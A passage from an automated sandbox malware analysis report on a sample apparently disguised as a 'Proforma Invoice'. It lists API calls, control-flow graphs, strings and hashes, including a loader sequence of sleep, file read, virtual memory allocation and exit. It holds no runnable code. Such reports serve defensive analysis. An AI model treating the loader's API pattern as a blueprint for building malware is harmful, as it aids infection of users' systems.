                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbv$pbv$pbv$pbv
                                                                                                • API String ID: 4212290369-3945742284
                                                                                                • Opcode ID: 9ba7a1de740d4c8b9a7347b4e6d6dcd3ec46da94e27832ab95552addf5a2d78a
                                                                                                • Instruction ID: 7daf87ff31d441e4bad32743a35c2274f0a4ae745f6300e4e084f4732af94450
                                                                                                • Opcode Fuzzy Hash: 9ba7a1de740d4c8b9a7347b4e6d6dcd3ec46da94e27832ab95552addf5a2d78a
                                                                                                • Instruction Fuzzy Hash: 55B2D170609781DFD724DF24C884BABBBE6BF85304F14491DF54A872A1CB75E885CB86

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 00708F5F: __time64.LIBCMT ref: 00708F69
                                                                                                  • Part of subcall function 006A4EE5: _fseek.LIBCMT ref: 006A4EFD
                                                                                                • __wsplitpath.LIBCMT ref: 00709234
                                                                                                  • Part of subcall function 006C40FB: __wsplitpath_helper.LIBCMT ref: 006C413B
                                                                                                • _wcscpy.LIBCMT ref: 00709247
                                                                                                • _wcscat.LIBCMT ref: 0070925A
                                                                                                • __wsplitpath.LIBCMT ref: 0070927F
                                                                                                • _wcscat.LIBCMT ref: 00709295
                                                                                                • _wcscat.LIBCMT ref: 007092A8
                                                                                                  • Part of subcall function 00708FA5: _memmove.LIBCMT ref: 00708FDE
                                                                                                  • Part of subcall function 00708FA5: _memmove.LIBCMT ref: 00708FED
                                                                                                • _wcscmp.LIBCMT ref: 007091EF
                                                                                                  • Part of subcall function 00709734: _wcscmp.LIBCMT ref: 00709824
                                                                                                  • Part of subcall function 00709734: _wcscmp.LIBCMT ref: 00709837
                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00709452
                                                                                                • _wcsncpy.LIBCMT ref: 007094C5
                                                                                                • DeleteFileW.KERNEL32(?,?), ref: 007094FB
                                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00709511
                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00709522
                                                                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00709534
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                • String ID:
                                                                                                • API String ID: 1500180987-0
                                                                                                • Opcode ID: 3899a84f12bff28a0544045bb73837a61bf01b40c15a0703fab04b58f4cbfed9
                                                                                                • Instruction ID: ab3d9b1e118fe30f82634e25e78b7f5f7dd98ead85c7c5beeecaef6e1582db30
                                                                                                • Opcode Fuzzy Hash: 3899a84f12bff28a0544045bb73837a61bf01b40c15a0703fab04b58f4cbfed9
                                                                                                • Instruction Fuzzy Hash: 90C14DB1D00219EADF21DF95CC85EDEB7BDEF85300F0041AAF609E6192EB749A448F65

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 006A3074
                                                                                                • RegisterClassExW.USER32(00000030), ref: 006A309E
                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006A30AF
                                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 006A30CC
                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006A30DC
                                                                                                • LoadIconW.USER32(000000A9), ref: 006A30F2
                                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006A3101
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                • API String ID: 2914291525-1005189915
                                                                                                • Opcode ID: a9f53189233c1fbde1c3a088832bb39a653d666e2166f864ab34826884149aee
                                                                                                • Instruction ID: 91ff7aaca695140aa5d6a9992adf4c92775941ee288617f7a9d343e0d59eb40e
                                                                                                • Opcode Fuzzy Hash: a9f53189233c1fbde1c3a088832bb39a653d666e2166f864ab34826884149aee
                                                                                                • Instruction Fuzzy Hash: 093169B1801349AFDB20CFA4EC89A9DBFF0FB09310F14816EE581E62A1D3B90581CF95

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 006A3074
                                                                                                • RegisterClassExW.USER32(00000030), ref: 006A309E
                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006A30AF
                                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 006A30CC
                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006A30DC
                                                                                                • LoadIconW.USER32(000000A9), ref: 006A30F2
                                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006A3101
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                • API String ID: 2914291525-1005189915
                                                                                                • Opcode ID: 67b3554e4b685ffe03b7de6bc580afe20a4b4a682a78f1e98b57b3e10602873c
                                                                                                • Instruction ID: 9b33baf5ac665f04bb10be27befed2f5566b8bf1531c3230688452d61b9dcf32
                                                                                                • Opcode Fuzzy Hash: 67b3554e4b685ffe03b7de6bc580afe20a4b4a682a78f1e98b57b3e10602873c
                                                                                                • Instruction Fuzzy Hash: C121F4B1D01319AFDB10DFA4EC88B9DBBF4FB08700F00812AF911A72A0D7B945459F99

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 006A4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007652F8,?,006A37AE,?), ref: 006A4724
                                                                                                  • Part of subcall function 006C050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,006A7165), ref: 006C052D
                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006A71A8
                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006DE8C8
                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 006DE909
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 006DE947
                                                                                                • _wcscat.LIBCMT ref: 006DE9A0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                • API String ID: 2673923337-2727554177
                                                                                                • Opcode ID: d403fc79562830715bad77b56e2bf873b41ea146b0bf39007165794ff3a88dc6
                                                                                                • Instruction ID: df8f345167d3679f44985e01a114833cb815756f54c02b9ebcad0cd6e2b85de9
                                                                                                • Opcode Fuzzy Hash: d403fc79562830715bad77b56e2bf873b41ea146b0bf39007165794ff3a88dc6
                                                                                                • Instruction Fuzzy Hash: 0A71A1715093019EC340EF25EC619ABBBF9FF89310F80452EF446872A1EBB59949CF99

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 760 6a3633-6a3681 762 6a3683-6a3686 760->762 763 6a36e1-6a36e3 760->763 765 6a3688-6a368f 762->765 766 6a36e7 762->766 763->762 764 6a36e5 763->764 767 6a36ca-6a36d2 DefWindowProcW 764->767 770 6a374b-6a3753 PostQuitMessage 765->770 771 6a3695-6a369a 765->771 768 6dd0cc-6dd0fa call 6b1070 call 6b1093 766->768 769 6a36ed-6a36f0 766->769 778 6a36d8-6a36de 767->778 807 6dd0ff-6dd106 768->807 772 6a36f2-6a36f3 769->772 773 6a3715-6a373c SetTimer RegisterWindowMessageW 769->773 777 6a3711-6a3713 770->777 775 6dd154-6dd168 call 702527 771->775 776 6a36a0-6a36a2 771->776 779 6dd06f-6dd072 772->779 780 6a36f9-6a370c KillTimer call 6a443a call 6a3114 772->780 773->777 782 6a373e-6a3749 CreatePopupMenu 773->782 775->777 801 6dd16e 775->801 783 6a36a8-6a36ad 776->783 784 6a3755-6a3764 call 6a44a0 776->784 777->778 786 6dd0a8-6dd0c7 MoveWindow 779->786 787 6dd074-6dd076 779->787 780->777 782->777 790 6dd139-6dd140 783->790 791 6a36b3-6a36b8 783->791 784->777 786->777 794 6dd078-6dd07b 787->794 795 6dd097-6dd0a3 SetFocus 787->795 790->767 797 6dd146-6dd14f call 6f7c36 790->797 799 6a36be-6a36c4 791->799 800 6dd124-6dd134 call 702d36 791->800 794->799 803 6dd081-6dd092 call 6b1070 794->803 795->777 797->767 799->767 799->807 800->777 801->767 803->777 807->767 811 6dd10c-6dd11f call 6a443a call 6a434a 807->811 811->767
                                                                                                APIs
                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 006A36D2
                                                                                                • KillTimer.USER32(?,00000001), ref: 006A36FC
                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006A371F
                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006A372A
                                                                                                • CreatePopupMenu.USER32 ref: 006A373E
                                                                                                • PostQuitMessage.USER32(00000000), ref: 006A374D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                • String ID: TaskbarCreated$%s
                                                                                                • API String ID: 129472671-2167414192
                                                                                                • Opcode ID: 5dd938f6983c46b5de7ca870396191a95b9ea591777b376bba2534b2ce4e6456
                                                                                                • Instruction ID: 5fcfb35590a680e500fd6727a16f9f35716c2b66682487ed3c885d4dfbe062cc
                                                                                                • Opcode Fuzzy Hash: 5dd938f6983c46b5de7ca870396191a95b9ea591777b376bba2534b2ce4e6456
                                                                                                • Instruction Fuzzy Hash: EF412BB1200615BBDB207F68DC19BB93797EB46300F504139F503963A1CAA9AE46AB7D

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 006A3A50
                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 006A3A5F
                                                                                                • LoadIconW.USER32(00000063), ref: 006A3A76
                                                                                                • LoadIconW.USER32(000000A4), ref: 006A3A88
                                                                                                • LoadIconW.USER32(000000A2), ref: 006A3A9A
                                                                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006A3AC0
                                                                                                • RegisterClassExW.USER32(?), ref: 006A3B16
                                                                                                  • Part of subcall function 006A3041: GetSysColorBrush.USER32(0000000F), ref: 006A3074
                                                                                                  • Part of subcall function 006A3041: RegisterClassExW.USER32(00000030), ref: 006A309E
                                                                                                  • Part of subcall function 006A3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006A30AF
                                                                                                  • Part of subcall function 006A3041: InitCommonControlsEx.COMCTL32(?), ref: 006A30CC
                                                                                                  • Part of subcall function 006A3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006A30DC
                                                                                                  • Part of subcall function 006A3041: LoadIconW.USER32(000000A9), ref: 006A30F2
                                                                                                  • Part of subcall function 006A3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006A3101
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                • String ID: #$0$AutoIt v3
                                                                                                • API String ID: 423443420-4155596026
                                                                                                • Opcode ID: e06635936b282603f7cdd4514431b907771bccf4d886fa192a43ad09dc69d5ad
                                                                                                • Instruction ID: 3edf072f5586a905bc5d0a88740ac9a0009f9a040859b48102939a4e878150a2
                                                                                                • Opcode Fuzzy Hash: e06635936b282603f7cdd4514431b907771bccf4d886fa192a43ad09dc69d5ad
                                                                                                • Instruction Fuzzy Hash: 112148B0D00308AFEB50DFA4EC19B9D7BB5FB08711F00812AF505A63A1D7F95A40AF88

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$Rv
                                                                                                • API String ID: 1825951767-750447493
                                                                                                • Opcode ID: 988a71f8666291a7b6cdea9697af66d8b725e1ff33eda180b56288ebbca0b5a1
                                                                                                • Instruction ID: d027bbd74fa850b6f5722699838ef4c0a7648fef121dfab1de870e66d83c2c0c
                                                                                                • Opcode Fuzzy Hash: 988a71f8666291a7b6cdea9697af66d8b725e1ff33eda180b56288ebbca0b5a1
                                                                                                • Instruction Fuzzy Hash: B4A12B719102299ACB44FBA4DC51EEEB77ABF56300F44052EF416A7291EF786E08CF64

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 006C0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006C0193
                                                                                                  • Part of subcall function 006C0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 006C019B
                                                                                                  • Part of subcall function 006C0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006C01A6
                                                                                                  • Part of subcall function 006C0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006C01B1
                                                                                                  • Part of subcall function 006C0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 006C01B9
                                                                                                  • Part of subcall function 006C0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 006C01C1
                                                                                                  • Part of subcall function 006B60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,006AF930), ref: 006B6154
                                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 006AF9CD
                                                                                                • OleInitialize.OLE32(00000000), ref: 006AFA4A
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 006E45C8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                • String ID: <Wv$\Tv$%s$Sv
                                                                                                • API String ID: 1986988660-112676513
                                                                                                • Opcode ID: 2ac189c1f9b8bfea84fa0f8387540ffdc93671d12b8621dfc155905adec6216e
                                                                                                • Instruction ID: 5feeae59f64708c26f01e7409d8d0f890eb9d1d77ffb3123836da2475f5987a2
                                                                                                • Opcode Fuzzy Hash: 2ac189c1f9b8bfea84fa0f8387540ffdc93671d12b8621dfc155905adec6216e
                                                                                                • Instruction Fuzzy Hash: D381CDB0901B808E8394DF3AA8446587FE6EB48346F50C1BED44BC7362EBFC4485AF19

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 983 1e52600-1e526ae call 1e50000 986 1e526b5-1e526db call 1e53510 CreateFileW 983->986 989 1e526e2-1e526f2 986->989 990 1e526dd 986->990 998 1e526f4 989->998 999 1e526f9-1e52713 VirtualAlloc 989->999 991 1e5282d-1e52831 990->991 992 1e52873-1e52876 991->992 993 1e52833-1e52837 991->993 995 1e52879-1e52880 992->995 996 1e52843-1e52847 993->996 997 1e52839-1e5283c 993->997 1002 1e528d5-1e528ea 995->1002 1003 1e52882-1e5288d 995->1003 1004 1e52857-1e5285b 996->1004 1005 1e52849-1e52853 996->1005 997->996 998->991 1000 1e52715 999->1000 1001 1e5271a-1e52731 ReadFile 999->1001 1000->991 1006 1e52733 1001->1006 1007 1e52738-1e52778 VirtualAlloc 1001->1007 1010 1e528ec-1e528f7 VirtualFree 1002->1010 1011 1e528fa-1e52902 1002->1011 1008 1e52891-1e5289d 1003->1008 1009 1e5288f 1003->1009 1012 1e5285d-1e52867 1004->1012 1013 1e5286b 1004->1013 1005->1004 1006->991 1014 1e5277f-1e5279a call 1e53760 1007->1014 1015 1e5277a 1007->1015 1016 1e528b1-1e528bd 1008->1016 1017 1e5289f-1e528af 1008->1017 1009->1002 1010->1011 1012->1013 1013->992 1023 1e527a5-1e527af 1014->1023 1015->991 1020 1e528bf-1e528c8 1016->1020 1021 1e528ca-1e528d0 1016->1021 1019 1e528d3 1017->1019 1019->995 1020->1019 1021->1019 1024 1e527b1-1e527e0 call 1e53760 1023->1024 1025 1e527e2-1e527f6 call 1e53570 1023->1025 1024->1023 1030 1e527f8 1025->1030 1031 1e527fa-1e527fe 1025->1031 1030->991 1033 1e52800-1e52804 CloseHandle 1031->1033 1034 1e5280a-1e5280e 1031->1034 1033->1034 1035 1e52810-1e5281b VirtualFree 1034->1035 1036 1e5281e-1e52827 1034->1036 1035->1036 1036->986 1036->991
                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01E526D1
                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01E528F7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1769483837.0000000001E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1e50000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFileFreeVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 204039940-0
                                                                                                • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                                • Instruction ID: 39a3732166c6091183f7e24a530f604858168cf24671acb1a25899126ede1807
                                                                                                • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                                • Instruction Fuzzy Hash: 5DA10874E00209EBDB54CFE4C894BEEBBB5FF48304F209559EA01BB281D7759A85CB94

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1114 6a39d5-6a3a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                                APIs
                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006A3A03
                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 006A3A24
                                                                                                • ShowWindow.USER32(00000000,?,?), ref: 006A3A38
                                                                                                • ShowWindow.USER32(00000000,?,?), ref: 006A3A41
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CreateShow
                                                                                                • String ID: AutoIt v3$edit
                                                                                                • API String ID: 1584632944-3779509399
                                                                                                • Opcode ID: ee3091a3783ef6aa8c4eee322719a3262ba8fd450a6a3d5bfe9717f7f2b81445
                                                                                                • Instruction ID: cc94fbd3231b67fdb624306d4284ba95cbe18de8eaa20fab1edf4b4a49a36787
                                                                                                • Opcode Fuzzy Hash: ee3091a3783ef6aa8c4eee322719a3262ba8fd450a6a3d5bfe9717f7f2b81445
                                                                                                • Instruction Fuzzy Hash: 5BF03AB05007907EEA3057236C19E2B2E7DE7C6F60F00803EF901A2270C2A91841EAB8

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1115 1e523b0-1e52503 call 1e50000 call 1e522a0 CreateFileW 1122 1e52505 1115->1122 1123 1e5250a-1e5251a 1115->1123 1124 1e525ba-1e525bf 1122->1124 1126 1e52521-1e5253b VirtualAlloc 1123->1126 1127 1e5251c 1123->1127 1128 1e5253d 1126->1128 1129 1e5253f-1e52556 ReadFile 1126->1129 1127->1124 1128->1124 1130 1e52558 1129->1130 1131 1e5255a-1e52594 call 1e522e0 call 1e512a0 1129->1131 1130->1124 1136 1e52596-1e525ab call 1e52330 1131->1136 1137 1e525b0-1e525b8 ExitProcess 1131->1137 1136->1137 1137->1124
                                                                                                APIs
                                                                                                  • Part of subcall function 01E522A0: Sleep.KERNELBASE(000001F4), ref: 01E522B1
                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01E524F9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1769483837.0000000001E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1e50000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFileSleep
                                                                                                • String ID: 91NLS9MMVB8A4ZQGEEE2NZFPCU
                                                                                                • API String ID: 2694422964-758164160
                                                                                                • Opcode ID: 30c869f02ab03eda20b4b96f55c0cef5e20b9ac1b924e616b5ab162d19893847
                                                                                                • Instruction ID: 81fa5218c1e54d73e670d0520bb06abd99e0755161863ce744202587cef1e680
                                                                                                • Opcode Fuzzy Hash: 30c869f02ab03eda20b4b96f55c0cef5e20b9ac1b924e616b5ab162d19893847
                                                                                                • Instruction Fuzzy Hash: FF619170D04289DBEF11DBF4C854BDEBBB9AF19304F004199E6497B2C1D6BA0B45CB66

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
